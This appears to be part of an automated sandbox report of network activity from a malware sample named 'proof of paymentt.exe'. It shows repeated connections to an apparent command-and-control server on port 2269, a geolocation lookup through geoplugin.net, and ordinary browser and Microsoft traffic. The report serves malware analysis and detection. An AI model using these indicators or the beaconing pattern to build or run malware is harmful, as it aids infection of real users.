May 3, 2024 11:21:14.292560101 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:14.292625904 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:15.760129929 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:15.765561104 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:15.765580893 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:15.765595913 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:15.765607119 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:16.128365040 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:16.128365040 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:16.128408909 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:16.128458023 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:16.645642996 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:16.645730972 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:16.686862946 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:16.695981026 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:16.985444069 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:16.985644102 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:17.024496078 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:17.024629116 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:17.314265013 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:17.356803894 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:17.365832090 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:17.365883112 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:21.838613033 CEST	443	49724	142.251.41.4	192.168.2.5
May 3, 2024 11:21:21.838679075 CEST	443	49724	142.251.41.4	192.168.2.5
May 3, 2024 11:21:21.838751078 CEST	49724	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:23.823438883 CEST	49724	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:23.823462009 CEST	443	49724	142.251.41.4	192.168.2.5
May 3, 2024 11:21:33.595994949 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:21:33.597373962 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:34.230422020 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:34.405497074 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:21:34.405618906 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:34.735174894 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:21:35.715923071 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:21:52.654671907 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:52.654709101 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:52.654764891 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:52.655380964 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:52.655395985 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.133564949 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.133697987 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.138133049 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.138147116 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.138389111 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.149770021 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.192121029 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.605412006 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.605437994 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.605453014 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.605506897 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.605526924 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.605573893 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.606050014 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.606090069 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.606112003 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.606118917 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.606157064 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.606163025 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.606206894 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.609723091 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.609743118 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:21:53.609755039 CEST	49733	443	192.168.2.5	40.127.169.103
May 3, 2024 11:21:53.609761000 CEST	443	49733	40.127.169.103	192.168.2.5
May 3, 2024 11:22:03.759438038 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:22:03.761224031 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:22:04.121530056 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:22:09.386096001 CEST	49735	443	192.168.2.5	142.251.41.4
May 3, 2024 11:22:09.386132956 CEST	443	49735	142.251.41.4	192.168.2.5
May 3, 2024 11:22:09.386193991 CEST	49735	443	192.168.2.5	142.251.41.4
May 3, 2024 11:22:09.386466026 CEST	49735	443	192.168.2.5	142.251.41.4
May 3, 2024 11:22:09.386480093 CEST	443	49735	142.251.41.4	192.168.2.5
May 3, 2024 11:22:09.574451923 CEST	443	49735	142.251.41.4	192.168.2.5
May 3, 2024 11:22:09.574702978 CEST	49735	443	192.168.2.5	142.251.41.4
May 3, 2024 11:22:09.574721098 CEST	443	49735	142.251.41.4	192.168.2.5
May 3, 2024 11:22:09.575383902 CEST	443	49735	142.251.41.4	192.168.2.5
May 3, 2024 11:22:09.575758934 CEST	49735	443	192.168.2.5	142.251.41.4
May 3, 2024 11:22:09.575858116 CEST	443	49735	142.251.41.4	192.168.2.5
May 3, 2024 11:22:09.618781090 CEST	49735	443	192.168.2.5	142.251.41.4
May 3, 2024 11:22:19.584161997 CEST	443	49735	142.251.41.4	192.168.2.5
May 3, 2024 11:22:19.584232092 CEST	443	49735	142.251.41.4	192.168.2.5
May 3, 2024 11:22:19.584342003 CEST	49735	443	192.168.2.5	142.251.41.4
May 3, 2024 11:22:21.497011900 CEST	49735	443	192.168.2.5	142.251.41.4
May 3, 2024 11:22:21.497056007 CEST	443	49735	142.251.41.4	192.168.2.5
May 3, 2024 11:22:33.871247053 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:22:33.989177942 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:22:34.026367903 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:22:34.453387976 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:22:47.494708061 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:22:47.947647095 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:22:48.947655916 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:22:50.759042978 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:22:54.353862047 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:23:01.556265116 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:23:03.898458004 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:23:03.993608952 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:23:05.000751019 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:23:05.416649103 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:23:15.962455034 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:23:33.978338957 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:23:33.980441093 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:23:34.483520031 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:24:04.125427961 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:24:04.129704952 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:24:04.751363039 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:24:04.751435995 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:24:04.782149076 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:24:05.062532902 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:24:05.186567068 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:24:34.207643032 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:24:34.211709023 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:24:34.576215029 CEST	2269	49707	37.120.235.122	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 11:20:57.510768890 CEST	54463	53	192.168.2.5	1.1.1.1
May 3, 2024 11:20:57.599694967 CEST	53	54463	1.1.1.1	192.168.2.5
May 3, 2024 11:21:05.144448996 CEST	53	61734	1.1.1.1	192.168.2.5
May 3, 2024 11:21:05.170620918 CEST	62769	53	192.168.2.5	1.1.1.1
May 3, 2024 11:21:05.170847893 CEST	53946	53	192.168.2.5	1.1.1.1
May 3, 2024 11:21:05.256632090 CEST	53	58329	1.1.1.1	192.168.2.5
May 3, 2024 11:21:05.258358955 CEST	53	62769	1.1.1.1	192.168.2.5
May 3, 2024 11:21:05.258511066 CEST	53	53946	1.1.1.1	192.168.2.5
May 3, 2024 11:21:05.808679104 CEST	53	56751	1.1.1.1	192.168.2.5
May 3, 2024 11:21:25.895941019 CEST	53	50774	1.1.1.1	192.168.2.5
May 3, 2024 11:21:44.845968962 CEST	53	62478	1.1.1.1	192.168.2.5
May 3, 2024 11:22:04.647579908 CEST	53	64906	1.1.1.1	192.168.2.5
May 3, 2024 11:22:07.632201910 CEST	53	65200	1.1.1.1	192.168.2.5
May 3, 2024 11:22:32.710522890 CEST	53	62711	1.1.1.1	192.168.2.5
May 3, 2024 11:22:34.091290951 CEST	53	55833	1.1.1.1	192.168.2.5
May 3, 2024 11:23:18.835131884 CEST	53	51156	1.1.1.1	192.168.2.5
May 3, 2024 11:24:33.270512104 CEST	53	53135	1.1.1.1	192.168.2.5
May 3, 2024 11:24:40.979929924 CEST	138	138	192.168.2.5	192.168.2.255

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 3, 2024 11:22:34.091370106 CEST	192.168.2.5	1.1.1.1	c222	(Port unreachable)	Destination Unreachable
May 3, 2024 11:22:35.216974974 CEST	192.168.2.5	1.1.1.1	c234	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 3, 2024 11:20:57.510768890 CEST	192.168.2.5	1.1.1.1	0xe04d	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
May 3, 2024 11:21:05.170620918 CEST	192.168.2.5	1.1.1.1	0x966d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 3, 2024 11:21:05.170847893 CEST	192.168.2.5	1.1.1.1	0x75b6	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 3, 2024 11:20:57.599694967 CEST	1.1.1.1	192.168.2.5	0xe04d	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false
May 3, 2024 11:21:05.258358955 CEST	1.1.1.1	192.168.2.5	0x966d	No error (0)	www.google.com	142.251.41.4	A (IP address)	IN (0x0001)	false
May 3, 2024 11:21:05.258511066 CEST	1.1.1.1	192.168.2.5	0x75b6	No error (0)	www.google.com		65	IN (0x0001)	false

HTTP Request Dependency Graph

fs.microsoft.com

www.google.com

slscr.update.microsoft.com

https:

www.bing.com

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	178.237.33.50	80	6112	C:\Users\user\Desktop\proof of paymentt.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:20:57.774470091 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
May 3, 2024 11:20:57.945354939 CEST	1173	IN	HTTP/1.1 200 OK date: Fri, 03 May 2024 09:20:57 GMT server: Apache content-length: 965 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED] Data Ascii: { "geoplugin_request":"191.96.227.219", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	104.126.112.149	443

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:20:58 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-03 09:20:58 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=250970 Date: Fri, 03 May 2024 09:20:58 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49714	104.126.112.149	443

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:20:58 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-03 09:20:58 UTC	531	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 08K+nYgAAAACXC/Ywsy9UQ60qHfPpvzYzU0pDRURHRTA1MTIAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=250880 Date: Fri, 03 May 2024 09:20:58 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-03 09:20:58 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	142.251.41.4	443	5684	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:21:05 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-03 09:21:05 UTC	1191	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 09:21:05 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-xGNLPucVbcHmcW-h67Yfdw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-03 09:21:05 UTC	64	IN	Data Raw: 32 63 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 6f 6e 63 65 72 74 20 77 65 65 6b 20 24 32 35 20 74 69 63 6b 65 74 73 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 22 2c 22 62 6a 20 77 65 73 Data Ascii: 2cf)]}'["",["concert week $25 tickets","apple iphone","bj wes
2024-05-03 09:21:05 UTC	662	IN	Data Raw: 74 20 64 65 6e 76 65 72 20 62 72 6f 6e 63 6f 73 22 2c 22 71 75 6f 72 64 6c 65 20 68 69 6e 74 73 20 74 6f 64 61 79 22 2c 22 74 6f 72 6e 61 64 6f 65 73 22 2c 22 72 61 6e 64 79 20 74 72 61 76 69 73 20 6e 65 77 20 73 6f 6e 67 22 2c 22 67 74 61 20 36 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 62 6f 72 65 61 6c 69 73 20 74 72 61 69 6e 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 Data Ascii: t denver broncos","quordle hints today","tornadoes","randy travis new song","gta 6 release date","borealis trains"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d"
2024-05-03 09:21:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49719	142.251.41.4	443	5684	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:21:05 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49716	142.251.41.4	443	5684	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:21:05 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-03 09:21:05 UTC	1331	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGIHZ0rEGIjB_Qkm3crtF5Diayds78MQPvcGWLxph33UahTGVaOvK_O2C395pW0j53DoBQmglIRIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIgdnSsQYQt8_8uwMSBL9g49s Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 03 May 2024 09:21:05 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-03-09; expires=Sun, 02-Jun-2024 09:21:05 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=kf08ap03Enu5vH37Q9HwnjLUtxfa6l9M-obfy7WtzK2ZMJeTXigT5vVPCPaqgLe-8OzIDVElm82UrleNC9YlYfv7bkgGrz69oUBmTJ3MAv6roDxmYcpgpXDdKlv1QN9yg_UY_Y6aYr6PryPeLIu0zDCI1ApCUnSIaKK2o2tpjLQ; expires=Sat, 02-Nov-2024 09:21:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-03 09:21:05 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49717	142.251.41.4	443	5684	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:21:05 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-03 09:21:06 UTC	1249	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGIHZ0rEGIjDiV69rK5qM04HlVCP5HIxKT4yFlyXGN87fd-gxnuiXdKGTW6789z2jSG8fGE3fLfIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIgdnSsQYQ1ZS5zwMSBL9g49s Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 03 May 2024 09:21:05 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-03-09; expires=Sun, 02-Jun-2024 09:21:05 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=LlUHQLr5Y133oMGNzEa_SRif_xUDN8HY8u4HhyWXXk0hbbeVRnqkU6_cYn6XuNP9iSnwoQM46aM2DIhUrR3ksC4ODkTNTP2EulpgsMZFBF7hobj7s2cdGaRL-gaeDymBN1kscScb2mGnBHyhG5GD0ZhuJa8JFCTcQ9CmCCLOoKE; expires=Sat, 02-Nov-2024 09:21:05 GMT; path=/; 